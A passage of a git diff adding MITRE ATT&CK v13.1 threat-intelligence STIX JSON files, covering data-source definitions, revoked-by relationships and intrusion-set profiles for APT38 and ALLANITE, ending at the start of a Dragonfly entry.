"https://confluence.atlassian.com/confkb/how-to-enable-command-line-audit-logging-in-linux-956166545.html" + }, + { + "source_name": "Audit OSX", + "description": "Gagliardi, R. (n.d.). Audit in a OS X System. Retrieved September 23, 2021.", + "url": "https://www.scip.ch/en/?labs.20150108" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-12-07T19:50:56.964Z", + "name": "Script", + "description": "A file or stream containing a list of commands, allowing them to be launched in sequence(Citation: Microsoft PowerShell Logging)(Citation: FireEye PowerShell Logging)(Citation: Microsoft AMSI)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--12c1e727-7fa4-49b6-af81-366ed2ce231e", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0012", + "external_id": "DS0012" + }, + { + "source_name": "FireEye PowerShell Logging", + "description": "Dunwoody, M. (2016, February 11). Greater Visibility Through PowerShell Logging. Retrieved September 28, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html" + }, + { + "source_name": "Microsoft AMSI", + "description": "Microsoft. (2019, April 19). Antimalware Scan Interface (AMSI). Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + }, + { + "source_name": "Microsoft PowerShell Logging", + "description": "Microsoft. (2020, March 30). about_Logging_Windows. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-20T18:38:13.356Z", + "name": "Network Traffic", + "description": "Data transmitted across a network (ex: Web, DNS, Mail, File, etc.), that is either summarized (ex: Netflow) and/or captured as raw data in an analyzable format (ex: PCAP)", + "x_mitre_platforms": [ + "IaaS", + "Linux", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "ExtraHop" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host", + "Network" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0029", + "external_id": "DS0029" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0011", + "external_id": "DS0011" + }, + { + "source_name": "Microsoft LoadLibrary", + "description": "Microsoft. (2018, December 5). LoadLibraryA function (libloaderapi.h). Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya" + }, + { + "source_name": "Microsoft Module Class", + "description": "Microsoft. (n.d.). Module Class. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module" + } + ], + "modified": "2022-03-30T14:26:51.806Z", + "name": "Module", + "description": "Executable files consisting of one or more shared classes and interfaces, such as portable executable (PE) format binaries/dynamic link libraries (DLL), executable and linkable format (ELF) binaries/shared libraries, and Mach-O format binaries/shared libraries(Citation: Microsoft LoadLibrary)(Citation: Microsoft Module Class)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0024", + "external_id": "DS0024" + }, + { + "source_name": "Microsoft Registry", + "description": "Microsoft. (2018, May 31). Registry. Retrieved September 29, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + } + ], + "modified": "2022-05-11T14:00:00.188Z", + "name": "Windows Registry", + "description": "A Windows OS hierarchical database that stores much of the information and settings for software programs, hardware devices, user preferences, and operating-system configurations(Citation: Microsoft Registry)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-24T19:14:15.637Z", + "name": "Asset", + "description": "Data sources with information about the set of devices found within the network, along with their current software and configurations", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--b1717cb4-d536-4e2b-b5e5-07e67e26183c", + "created": "2022-05-11T16:22:58.802Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0039", + "external_id": "DS0039" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-12-07T19:35:34.863Z", + "name": "File", + "description": "A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media).(Citation: Microsoft File Mgmt)", + "x_mitre_platforms": [ + "Linux", + "Network", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0022", + "external_id": "DS0022" + }, + { + "source_name": "Microsoft File Mgmt", + "description": "Microsoft. (2018, May 31). File Management (Local File Systems). Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0016", + "external_id": "DS0016" + }, + { + "source_name": "Sysmon EID 9", + "description": "Russinovich, R. & Garnier, T. (2021, August 18). Sysmon Event ID 9. Retrieved September 24, 2021.", + "url": "https://docs.microsoft.com/sysinternals/downloads/sysmon#event-id-9-rawaccessread" + } + ], + "modified": "2022-03-30T14:26:51.804Z", + "name": "Drive", + "description": "A non-volatile data storage device (hard drive, floppy disk, USB flash drive) with at least one formatted partition, typically mounted to the file system and/or assigned a drive letter(Citation: Sysmon EID 9)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.265Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0001", + "external_id": "DS0001" + } + ], + "modified": "2022-03-30T14:26:51.805Z", + "name": "Firmware", + "description": "Computer software that provides low-level control for the hardware and device(s) of a host, such as BIOS or UEFI/EFI", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Containers", + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Container", + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0003", + "external_id": "DS0003" + }, + { + "source_name": "Microsoft Tasks", + "description": "Microsoft. (2018, May 31). Tasks. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + } + ], + "modified": "2022-03-30T14:26:51.806Z", + "name": "Scheduled Job", + "description": "Automated tasks that can be executed at a specific time or on a recurring schedule running in the background (ex: Cron daemon, task scheduler, BITS)(Citation: Microsoft Tasks)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0033", + "external_id": "DS0033" + }, + { + "source_name": "Microsoft NFS Overview", + "description": "Microsoft. (2018, July 9). Network File System overview. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview" + } + ], + "modified": "2022-03-30T14:26:51.806Z", + "name": "Network Share", + "description": "A storage resource (typically a folder or drive) made available from one host to others using network protocols, such as Server Message Block (SMB) or Network File System (NFS)(Citation: Microsoft NFS Overview)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0019", + "external_id": "DS0019" + }, + { + "source_name": "Microsoft Services", + "description": "Microsoft. (2017, March 30). Introduction to Windows Service Applications. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications" + }, + { + "source_name": "Linux Services Run Levels", + "description": "The Linux Foundation. (2006, January 11). An introduction to services, runlevels, and rc.d scripts. Retrieved September 28, 2021.", + "url": "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + } + ], + "modified": "2022-03-30T14:26:51.807Z", + "name": "Service", + "description": "A computer process that is configured to execute continuously in the background and perform system tasks, in some cases before any user has logged in(Citation: Microsoft Services)(Citation: Linux Services Run Levels)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-12-07T19:50:43.993Z", + "name": "User Account", + "description": "A profile representing a user, device, service, or application used to authenticate and access resources", + "x_mitre_platforms": [ + "Azure AD", + "Containers", + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Container", + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0002", + "external_id": "DS0002" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "ics-attack" + ], + "id": "intrusion-set--68ba94ab-78b8-43e7-83e2-aed3466882c6", + "type": "intrusion-set", + "created": "2018-01-16T16:13:52.465Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0057", + "external_id": "G0057" + } + ], + "modified": "2018-10-17T00:17:13.469Z", + "name": "APT34", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--dfd0dc6c-33ad-44a4-9def-1d8e23e278fb", + "created": "2022-04-15T22:05:32.209Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-15T22:05:32.209Z", + "relationship_type": "revoked-by", + "source_ref": "intrusion-set--76d59913-1d24-4992-a8ac-05a3eb093f71", + "target_ref": "intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--632ca9a0-a9f3-4b27-96e1-9fcb8bab11cb", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2018-10-17T00:14:20.652Z", + "relationship_type": "revoked-by", + "source_ref": "intrusion-set--68ba94ab-78b8-43e7-83e2-aed3466882c6", + "target_ref": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--90647f03-38a4-4364-a3af-53640a81360e", + "created": "2023-03-31T18:11:19.943Z", + "revoked": false, + "external_references": [ + { + "source_name": "Joe Slowik August 2019", + "description": "Joe Slowik 2019, August 15 CRASHOVERRIDE: Reassessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack Retrieved. 2019/10/22 ", + "url": "https://dragos.com/wp-content/uploads/CRASHOVERRIDE.pdf" + }, + { + "source_name": "US District Court Indictment GRU Unit 74455 October 2020", + "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T18:11:19.943Z", + "description": "(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: Joe Slowik August 2019)", + "relationship_type": "attributed-to", + "source_ref": "campaign--aa73efef-1418-4dbe-b43c-87a498e97234", + "target_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "type": "identity", + "identity_class": "organization", + "created": "2017-06-01T00:00:00.000Z", + "modified": "2017-06-01T00:00:00.000Z", + "name": "The MITRE Corporation" + }, + { + "definition": { + "statement": "Copyright 2015-2023, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation." + }, + "id": "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168", + "type": "marking-definition", + "created": "2017-06-01T00:00:00.000Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "definition_type": "statement", + "x_mitre_attack_spec_version": "2.1.0" + } + ], + "spec_version": "2.0" +} diff --git a/cti-ATT-CK-v13.1/ics-attack/identity/identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5.json b/cti-ATT-CK-v13.1/ics-attack/identity/identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5.json new file mode 100644 index 0000000000000000000000000000000000000000..49a8aa5c2bd70fe0380bb5ab1e5a19227efddb99 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/identity/identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5.json @@ -0,0 +1,18 @@ +{ + "type": "bundle", + "id": "bundle--980aaf59-907a-45de-a2cb-591831336d1b", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "type": "identity", + "identity_class": "organization", + "created": "2017-06-01T00:00:00.000Z", + "modified": "2017-06-01T00:00:00.000Z", + "name": "The MITRE Corporation" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340.json new file mode 100644 index 0000000000000000000000000000000000000000..5848772a4deb70ee859d24450acea41540096808 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340.json @@ -0,0 +1,94 @@ +{ + "type": "bundle", + "id": "bundle--8eb81101-b697-4838-95ed-743d52c74fbe", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "APT38", + "NICKEL GLADSTONE", + "BeagleBoyz", + "Bluenoroff", + "Stardust Chollima" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340", + "type": "intrusion-set", + "created": "2019-01-29T21:27:24.793Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0082", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0082" + }, + { + "source_name": "APT38", + "description": "(Citation: FireEye APT38 Oct 2018)" + }, + { + "source_name": "NICKEL GLADSTONE", + "description": "(Citation: SecureWorks NICKEL GLADSTONE profile Sept 2021)" + }, + { + "source_name": "BeagleBoyz", + "description": "(Citation: CISA AA20-239A BeagleBoyz August 2020)" + }, + { + "source_name": "Bluenoroff", + "description": "(Citation: Kaspersky Lazarus Under The Hood Blog 2017)" + }, + { + "source_name": "Stardust Chollima", + "description": "(Citation: CrowdStrike Stardust Chollima Profile April 2018)(Citation: CrowdStrike GTR 2021 June 2021)" + }, + { + "source_name": "CISA AA20-239A BeagleBoyz August 2020", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-239a", + "description": "DHS/CISA. (2020, August 26). FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks. Retrieved September 29, 2021." + }, + { + "source_name": "FireEye APT38 Oct 2018", + "url": "https://content.fireeye.com/apt/rpt-apt38", + "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018." + }, + { + "source_name": "DOJ North Korea Indictment Feb 2021", + "url": "https://www.justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and", + "description": "Department of Justice. (2021, February 17). Three North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyberattacks and Financial Crimes Across the Globe. Retrieved June 9, 2021." + }, + { + "description": "GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.", + "url": "https://securelist.com/lazarus-under-the-hood/77908/", + "source_name": "Kaspersky Lazarus Under The Hood Blog 2017" + }, + { + "source_name": "SecureWorks NICKEL GLADSTONE profile Sept 2021", + "url": "https://www.secureworks.com/research/threat-profiles/nickel-gladstone", + "description": "SecureWorks. (2021, September 29). NICKEL GLADSTONE Threat Profile. Retrieved September 29, 2021." + }, + { + "source_name": "CrowdStrike Stardust Chollima Profile April 2018", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-april-stardust-chollima/", + "description": "Meyers, Adam. (2018, April 6). Meet CrowdStrike\u2019s Adversary of the Month for April: STARDUST CHOLLIMA. Retrieved September 29, 2021." + }, + { + "source_name": "CrowdStrike GTR 2021 June 2021", + "url": "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "description": "CrowdStrike. (2021, June 7). CrowdStrike 2021 Global Threat Report. Retrieved September 29, 2021." + } + ], + "modified": "2022-01-18T17:13:14.610Z", + "name": "APT38", + "description": "[APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017)\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.", + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--190242d7-73fc-4738-af68-20162f7a5aae.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--190242d7-73fc-4738-af68-20162f7a5aae.json new file mode 100644 index 0000000000000000000000000000000000000000..8d28fe5fe2e72e37bf823df795ac8706c8dba87d --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--190242d7-73fc-4738-af68-20162f7a5aae.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--bb0972a5-450a-4e6d-b585-e3b2a771a600", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "ALLANITE", + "Palmetto Fusion" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--190242d7-73fc-4738-af68-20162f7a5aae", + "created": "2017-05-31T21:31:57.307Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "G1000", + "url": "https://attack.mitre.org/groups/G1000" + }, + { + "source_name": "Dragos", + "url": "https://dragos.com/resource/allanite/", + "description": "Dragos Allanite Retrieved. 2019/10/27 " + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[ALLANITE](https://attack.mitre.org/groups/G1000) is a suspected Russian cyber espionage group, that has primarily targeted the electric utility sector within the United States and United Kingdom. The group's tactics and techniques are reportedly similar to [Dragonfly](https://attack.mitre.org/groups/G0035), although [ALLANITE](https://attack.mitre.org/groups/G1000)s technical capabilities have not exhibited disruptive or destructive abilities. It has been suggested that the group maintains a presence in ICS for the purpose of gaining understanding of processes and to maintain persistence. (Citation: Dragos)", + "modified": "2022-05-24T19:26:10.721Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "ALLANITE", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1.json new file mode 100644 index 0000000000000000000000000000000000000000..f4ea7a1436425a6f27ab0cf287327f70b746cfb4 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1.json @@ -0,0 +1,145 @@ +{ + "type": "bundle", + "id": "bundle--59720d00-615e-4878-b5ab-736e626221c9", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:03:28.170Z", + "name": "Dragonfly", + "description": 